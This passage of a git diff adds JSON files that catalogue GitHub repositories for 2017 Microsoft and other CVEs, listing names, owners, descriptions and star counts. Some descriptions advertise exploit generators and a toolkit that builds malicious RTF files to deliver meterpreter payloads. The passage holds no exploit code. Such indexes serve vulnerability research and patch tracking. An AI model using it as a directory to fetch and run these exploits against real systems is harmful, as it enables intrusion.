"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59578141?v=4", + "html_url": "https:\/\/github.com\/sfitpro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sfitpro\/cve-2017-8529", + "description": "My CVE-2017-8529 files", + "fork": false, + "created_at": "2020-02-09T05:46:20Z", + "updated_at": "2020-02-09T05:49:47Z", + "pushed_at": "2020-02-09T05:49:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635646957, + "name": "windows2016fixCVE-2017-8529", + "full_name": "kaddirov\/windows2016fixCVE-2017-8529", + "owner": { + "login": "kaddirov", + "id": 34181387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34181387?v=4", + "html_url": "https:\/\/github.com\/kaddirov", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaddirov\/windows2016fixCVE-2017-8529", + "description": null, + "fork": false, + "created_at": "2023-05-03T06:37:59Z", + "updated_at": "2023-05-03T06:37:59Z", + "pushed_at": "2019-09-04T05:35:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8543.json b/2017/CVE-2017-8543.json new file mode 100644 index 0000000000..5de99572e5 --- /dev/null +++ b/2017/CVE-2017-8543.json @@ -0,0 +1,33 @@ +[ + { + "id": 94720681, + "name": "windows-security-cve-2017-8543", + "full_name": "americanhanko\/windows-security-cve-2017-8543", + "owner": { + "login": "americanhanko", + "id": 8458267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8458267?v=4", + "html_url": "https:\/\/github.com\/americanhanko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/americanhanko\/windows-security-cve-2017-8543", + "description": "InSpec profile to verify a node is patched and compliant for CVE-2017-8543", + "fork": false, + "created_at": "2017-06-19T00:15:09Z", + "updated_at": "2017-06-19T00:16:02Z", + "pushed_at": "2017-06-19T02:07:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8570.json b/2017/CVE-2017-8570.json new file mode 100644 index 0000000000..67eb0d684c --- /dev/null +++ b/2017/CVE-2017-8570.json @@ -0,0 +1,219 @@ +[ + { + "id": 98222699, + "name": "ppsx-file-generator", + "full_name": "temesgeny\/ppsx-file-generator", + "owner": { + "login": "temesgeny", + "id": 17720149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17720149?v=4", + "html_url": "https:\/\/github.com\/temesgeny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/temesgeny\/ppsx-file-generator", + "description": "ppsx file generator for cve-2017-8570 (based on bhdresh\/cve-2017-8570)", + "fork": false, + "created_at": "2017-07-24T18:35:26Z", + "updated_at": "2024-08-12T19:31:32Z", + "pushed_at": "2018-05-27T12:58:58Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 55, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 55, + "watchers": 67, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 116858521, + "name": "CVE-2017-8570", + "full_name": "rxwx\/CVE-2017-8570", + "owner": { + "login": "rxwx", + "id": 2202542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202542?v=4", + "html_url": "https:\/\/github.com\/rxwx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxwx\/CVE-2017-8570", + "description": "Proof of Concept exploit for CVE-2017-8570", + "fork": false, + "created_at": "2018-01-09T19:09:33Z", + "updated_at": "2024-08-12T19:35:23Z", + "pushed_at": "2018-01-09T19:23:43Z", + "stargazers_count": 185, + "watchers_count": 185, + "has_discussions": false, + "forks_count": 105, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 105, + "watchers": 185, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 122914059, + "name": "Office-CVE-2017-8570", + "full_name": "MaxSecurity\/Office-CVE-2017-8570", + "owner": { + "login": "MaxSecurity", + "id": 16812469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16812469?v=4", + "html_url": "https:\/\/github.com\/MaxSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaxSecurity\/Office-CVE-2017-8570", + "description": null, + "fork": false, + "created_at": "2018-02-26T04:41:24Z", + "updated_at": "2018-02-26T04:44:15Z", + "pushed_at": "2018-02-26T04:44:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 128627702, + "name": "CVE-2017-8570", + "full_name": "SwordSheath\/CVE-2017-8570", + "owner": { + "login": "SwordSheath", + "id": 21040108, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21040108?v=4", + "html_url": "https:\/\/github.com\/SwordSheath", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SwordSheath\/CVE-2017-8570", + "description": "CVE-2017-8570生成脚本(CVE-2017-0199另一种利用方式)", + "fork": false, + "created_at": "2018-04-08T10:07:17Z", + "updated_at": "2020-08-07T16:18:33Z", + "pushed_at": "2018-04-08T10:10:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 163988337, + "name": "CVE-2017-8570", + "full_name": "Drac0nids\/CVE-2017-8570", + "owner": { + "login": "Drac0nids", + "id": 31087166, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31087166?v=4", + "html_url": "https:\/\/github.com\/Drac0nids", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Drac0nids\/CVE-2017-8570", + "description": "## 在kali中自动化生成cve-2017-8570的恶意ppsx文件和配置msf监听", + "fork": false, + "created_at": "2019-01-03T15:12:39Z", + "updated_at": "2024-08-12T19:44:33Z", + "pushed_at": "2019-01-03T16:01:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 185678026, + "name": "CVE-2017-8570", + "full_name": "sasqwatch\/CVE-2017-8570", + "owner": { + "login": "sasqwatch", + "id": 22352904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22352904?v=4", + "html_url": "https:\/\/github.com\/sasqwatch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sasqwatch\/CVE-2017-8570", + "description": null, + "fork": false, + "created_at": "2019-05-08T20:53:27Z", + "updated_at": "2021-01-19T05:54:41Z", + "pushed_at": "2019-05-07T16:35:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 285525811, + "name": "CVE-2017-8570", + "full_name": "erfze\/CVE-2017-8570", + "owner": { + "login": "erfze", + "id": 38813661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38813661?v=4", + "html_url": "https:\/\/github.com\/erfze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erfze\/CVE-2017-8570", + "description": "CVE-2017-8570 Exp改造及样本分析", + "fork": false, + "created_at": "2020-08-06T09:12:37Z", + "updated_at": "2020-08-22T02:43:03Z", + "pushed_at": "2020-08-22T02:43:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8625.json b/2017/CVE-2017-8625.json new file mode 100644 index 0000000000..436804c0ea --- /dev/null +++ b/2017/CVE-2017-8625.json @@ -0,0 +1,37 @@ +[ + { + "id": 100988934, + "name": "CVE-2017-8625_Bypass_UMCI", + "full_name": "homjxi0e\/CVE-2017-8625_Bypass_UMCI", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-8625_Bypass_UMCI", + "description": "Bypass Feature UMCI in Internet Explorer", + "fork": false, + "created_at": "2017-08-21T20:14:07Z", + "updated_at": "2020-11-18T13:22:34Z", + "pushed_at": "2017-08-25T13:04:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bypass", + "cve-2017-8625", + "user-mode-code-integrity" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8641.json b/2017/CVE-2017-8641.json new file mode 100644 index 0000000000..e9cbe33fe1 --- /dev/null +++ b/2017/CVE-2017-8641.json @@ -0,0 +1,36 @@ +[ + { + "id": 100988677, + "name": "CVE-2017-8641_chakra_Js_GlobalObject", + "full_name": "homjxi0e\/CVE-2017-8641_chakra_Js_GlobalObject", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-8641_chakra_Js_GlobalObject", + "description": "There is a classic heap overflow when eval a string which large enough in Chakra! This issue can be reproduced steadly in uptodate Edge in Win10 WIP. An exception will occur immediatly when opening POC.html in Edge. ", + "fork": false, + "created_at": "2017-08-21T20:11:11Z", + "updated_at": "2022-04-28T13:45:25Z", + "pushed_at": "2017-08-23T09:09:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chakra-js-global-object", + "cve-2017-8641" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8759.json b/2017/CVE-2017-8759.json new file mode 100644 index 0000000000..49baf16805 --- /dev/null +++ b/2017/CVE-2017-8759.json @@ -0,0 +1,538 @@ +[ + { + "id": 103382657, + "name": "CVE-2017-8759-Exploit-sample", + "full_name": "Voulnet\/CVE-2017-8759-Exploit-sample", + "owner": { + "login": "Voulnet", + "id": 1334847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1334847?v=4", + "html_url": "https:\/\/github.com\/Voulnet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Voulnet\/CVE-2017-8759-Exploit-sample", + "description": "Running CVE-2017-8759 exploit sample.", + "fork": false, + "created_at": "2017-09-13T09:50:04Z", + "updated_at": "2024-08-12T19:32:34Z", + "pushed_at": "2020-01-23T06:53:00Z", + "stargazers_count": 255, + "watchers_count": 255, + "has_discussions": false, + "forks_count": 94, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 94, + "watchers": 255, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 103416775, + "name": "CVE-2017-8759", + "full_name": "nccgroup\/CVE-2017-8759", + "owner": { + "login": "nccgroup", + "id": 4067082, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4067082?v=4", + "html_url": "https:\/\/github.com\/nccgroup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nccgroup\/CVE-2017-8759", + "description": "NCC Group's analysis and exploitation of CVE-2017-8759 along with further refinements", + "fork": false, + "created_at": "2017-09-13T15:24:10Z", + "updated_at": "2024-08-12T19:32:34Z", + "pushed_at": "2017-09-19T18:06:41Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 94, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 103428172, + "name": "CVE-2017-8759", + "full_name": "vysecurity\/CVE-2017-8759", + "owner": { + "login": "vysecurity", + "id": 3596242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3596242?v=4", + "html_url": "https:\/\/github.com\/vysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vysecurity\/CVE-2017-8759", + "description": "CVE-2017-8759 - A vulnerability in the SOAP WDSL parser.", + "fork": false, + "created_at": "2017-09-13T17:10:18Z", + "updated_at": "2024-08-12T19:32:34Z", + "pushed_at": "2017-09-14T10:18:40Z", + "stargazers_count": 173, + "watchers_count": 173, + "has_discussions": false, + "forks_count": 74, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 74, + "watchers": 173, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 103447049, + "name": "CVE-2017-8759", + "full_name": "BasuCert\/CVE-2017-8759", + "owner": { + "login": "BasuCert", + "id": 29852431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29852431?v=4", + "html_url": "https:\/\/github.com\/BasuCert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BasuCert\/CVE-2017-8759", + "description": "CVE-2017-8759 Research", + "fork": false, + "created_at": "2017-09-13T20:27:29Z", + "updated_at": "2022-11-09T17:58:00Z", + "pushed_at": "2017-09-15T13:14:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 103447404, + "name": "CVE-2017-8759-Exploit-sample2", + "full_name": "tahisaad6\/CVE-2017-8759-Exploit-sample2", + "owner": { + "login": "tahisaad6", + "id": 21042116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21042116?v=4", + "html_url": "https:\/\/github.com\/tahisaad6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tahisaad6\/CVE-2017-8759-Exploit-sample2", + "description": null, + "fork": false, + "created_at": "2017-09-13T20:31:43Z", + "updated_at": "2017-09-13T20:31:43Z", + "pushed_at": "2017-09-13T20:31:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 103493845, + "name": "CVE-2017-8759_-SOAP_WSDL", + "full_name": "homjxi0e\/CVE-2017-8759_-SOAP_WSDL", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-8759_-SOAP_WSDL", + "description": "CVE-2017-8759 Remote Code Execution Vulnerability On SOAP WDSL - Microsoft .NET Framework 4.6.2 Microsoft .NET Framework 4.6.1 Microsoft .NET Framework 3.5.1 Microsoft .NET Framework 4.7 Microsoft .NET Framework 4.6 Microsoft .NET Framework 4.5.2 Microsoft .NET Framework 3.5", + "fork": false, + "created_at": "2017-09-14T06:20:28Z", + "updated_at": "2018-11-16T12:24:03Z", + "pushed_at": "2017-09-21T16:41:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "code", + "cve-2017-8759", + "execution", + "remote" + ], + "visibility": "public", + "forks": 6, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 103517315, + "name": "CVE-2017-8759", + "full_name": "bhdresh\/CVE-2017-8759", + "owner": { + "login": "bhdresh", + "id": 8931885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8931885?v=4", + "html_url": "https:\/\/github.com\/bhdresh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bhdresh\/CVE-2017-8759", + "description": "Exploit toolkit CVE-2017-8759 - v1.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft .NET Framework RCE. It could generate a malicious RTF file and deliver metasploit \/ meterpreter \/ other payload to victim without any complex configuration.", + "fork": false, + "created_at": "2017-09-14T10:04:39Z", + "updated_at": "2024-08-12T19:32:35Z", + "pushed_at": "2018-09-10T16:25:12Z", + "stargazers_count": 317, + "watchers_count": 317, + "has_discussions": false, + "forks_count": 109, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 109, + "watchers": 317, + "score": 0, + "subscribers_count": 24 + }, + { + "id": 103865283, + "name": "CVE-2017-8759", + "full_name": "JonasUliana\/CVE-2017-8759", + "owner": { + "login": "JonasUliana", + "id": 29503841, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29503841?v=4", + "html_url": "https:\/\/github.com\/JonasUliana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JonasUliana\/CVE-2017-8759", + "description": "Simple C# implementation of CVE-2017-8759", + "fork": false, + "created_at": "2017-09-17T22:05:56Z", + "updated_at": "2023-06-28T00:40:31Z", + "pushed_at": "2017-09-17T22:20:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "csharp", + "cve-2017-8759", + "exploit" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 104006150, + "name": "CVE-2017-8759", + "full_name": "sythass\/CVE-2017-8759", + "owner": { + "login": "sythass", + "id": 29907348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29907348?v=4", + "html_url": "https:\/\/github.com\/sythass", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sythass\/CVE-2017-8759", + "description": "CVE-2017-8759", + "fork": false, + "created_at": "2017-09-19T00:30:56Z", + "updated_at": "2017-09-18T00:45:48Z", + "pushed_at": "2017-09-17T06:16:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 104033989, + "name": "CVE-2017-8759-exploits", + "full_name": "ashr\/CVE-2017-8759-exploits", + "owner": { + "login": "ashr", + "id": 171286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171286?v=4", + "html_url": "https:\/\/github.com\/ashr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ashr\/CVE-2017-8759-exploits", + "description": "Two versions of CVE-2017-8759 exploits", + "fork": false, + "created_at": "2017-09-19T06:12:10Z", + "updated_at": "2024-08-12T19:32:43Z", + "pushed_at": "2017-09-19T06:19:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 104625403, + "name": "CVE-2017-8759", + "full_name": "l0n3rs\/CVE-2017-8759", + "owner": { + "login": "l0n3rs", + "id": 31120718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31120718?v=4", + "html_url": "https:\/\/github.com\/l0n3rs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3rs\/CVE-2017-8759", + "description": null, + "fork": false, + "created_at": "2017-09-24T06:58:55Z", + "updated_at": "2017-09-24T06:58:55Z", + "pushed_at": "2017-09-24T06:59:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 161397133, + "name": "CVE-2017-8759", + "full_name": "ChaitanyaHaritash\/CVE-2017-8759", + "owner": { + "login": "ChaitanyaHaritash", + "id": 16261173, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16261173?v=4", + "html_url": "https:\/\/github.com\/ChaitanyaHaritash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ChaitanyaHaritash\/CVE-2017-8759", + "description": "Just My ports of CVE-2017-8759", + "fork": false, + "created_at": "2018-12-11T21:39:39Z", + "updated_at": "2023-01-28T12:10:12Z", + "pushed_at": "2018-12-11T22:02:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 188365315, + "name": "CVE-2017-8759Expoit", + "full_name": "smashinu\/CVE-2017-8759Expoit", + "owner": { + "login": "smashinu", + "id": 30433218, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30433218?v=4", + "html_url": "https:\/\/github.com\/smashinu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smashinu\/CVE-2017-8759Expoit", + "description": "yehnah", + "fork": false, + "created_at": "2019-05-24T06:29:45Z", + "updated_at": "2019-05-30T02:01:34Z", + "pushed_at": "2019-05-30T02:01:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 193617602, + "name": "CVE-2017-8759", + "full_name": "adeljck\/CVE-2017-8759", + "owner": { + "login": "adeljck", + "id": 24542600, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24542600?v=4", + "html_url": "https:\/\/github.com\/adeljck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adeljck\/CVE-2017-8759", + "description": "CVE-2017-8759 微软word漏洞利用脚本", + "fork": false, + "created_at": "2019-06-25T02:17:04Z", + "updated_at": "2019-06-25T02:17:51Z", + "pushed_at": "2019-06-25T02:17:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 231332316, + "name": "CVE-2017-8759", + "full_name": "zhengkook\/CVE-2017-8759", + "owner": { + "login": "zhengkook", + "id": 32629417, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32629417?v=4", + "html_url": "https:\/\/github.com\/zhengkook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhengkook\/CVE-2017-8759", + "description": "CVE-2017-8759 use file", + "fork": false, + "created_at": "2020-01-02T07:43:19Z", + "updated_at": "2020-01-02T07:45:48Z", + "pushed_at": "2020-01-02T07:45:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 263371988, + "name": "SNP", + "full_name": "varunsaru\/SNP", + "owner": { + "login": "varunsaru", + "id": 39478192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39478192?v=4", + "html_url": "https:\/\/github.com\/varunsaru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/varunsaru\/SNP", + "description": "CVE-2017-8759 || report related with execute code vulnerability", + "fork": false, + "created_at": "2020-05-12T15:11:42Z", + "updated_at": "2020-05-12T18:14:25Z", + "pushed_at": "2020-05-12T18:14:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 263384480, + "name": "OHTS", + "full_name": "GayashanM\/OHTS", + "owner": { + "login": "GayashanM", + "id": 42294440, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42294440?v=4", + "html_url": "https:\/\/github.com\/GayashanM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GayashanM\/OHTS", + "description": "CVE-2017-8759 | .NET Framework Remote Code Execution Vulnerability", + "fork": false, + "created_at": "2020-05-12T16:00:39Z", + "updated_at": "2020-05-13T17:30:30Z", + "pushed_at": "2020-05-13T17:30:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8760.json b/2017/CVE-2017-8760.json new file mode 100644 index 0000000000..b15a5bc70e --- /dev/null +++ b/2017/CVE-2017-8760.json @@ -0,0 +1,33 @@ +[ + { + "id": 150201971, + "name": "cve-2017-8760", + "full_name": "Voraka\/cve-2017-8760", + "owner": { + "login": "Voraka", + "id": 20237180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20237180?v=4", + "html_url": "https:\/\/github.com\/Voraka", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Voraka\/cve-2017-8760", + "description": null, + "fork": false, + "created_at": "2018-09-25T03:23:13Z", + "updated_at": "2018-11-12T16:22:38Z", + "pushed_at": "2018-09-23T03:26:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8779.json b/2017/CVE-2017-8779.json new file mode 100644 index 0000000000..21550a6343 --- /dev/null +++ b/2017/CVE-2017-8779.json @@ -0,0 +1,36 @@ +[ + { + "id": 90798298, + "name": "GO-RPCBOMB", + "full_name": "drbothen\/GO-RPCBOMB", + "owner": { + "login": "drbothen", + "id": 6192325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6192325?v=4", + "html_url": "https:\/\/github.com\/drbothen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/drbothen\/GO-RPCBOMB", + "description": "CVE-2017-8779 aka RPCBomb", + "fork": false, + "created_at": "2017-05-09T22:43:10Z", + "updated_at": "2020-09-28T00:42:01Z", + "pushed_at": "2017-05-10T16:48:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-8779", + "rpcbomb" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8802.json b/2017/CVE-2017-8802.json new file mode 100644 index 0000000000..7649fc8646 --- /dev/null +++ b/2017/CVE-2017-8802.json @@ -0,0 +1,33 @@ +[ + { + "id": 118624965, + "name": "Zimbra-CVE-2017-8802-Hotifx", + "full_name": "ozzi-\/Zimbra-CVE-2017-8802-Hotifx", + "owner": { + "login": "ozzi-", + "id": 7944573, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7944573?v=4", + "html_url": "https:\/\/github.com\/ozzi-", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ozzi-\/Zimbra-CVE-2017-8802-Hotifx", + "description": "Security hotfix for CVE-2017-8802 ", + "fork": false, + "created_at": "2018-01-23T14:56:18Z", + "updated_at": "2018-01-23T14:56:59Z", + "pushed_at": "2018-01-23T14:58:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8809.json b/2017/CVE-2017-8809.json new file mode 100644 index 0000000000..0dc0d4c7d0 --- /dev/null +++ b/2017/CVE-2017-8809.json @@ -0,0 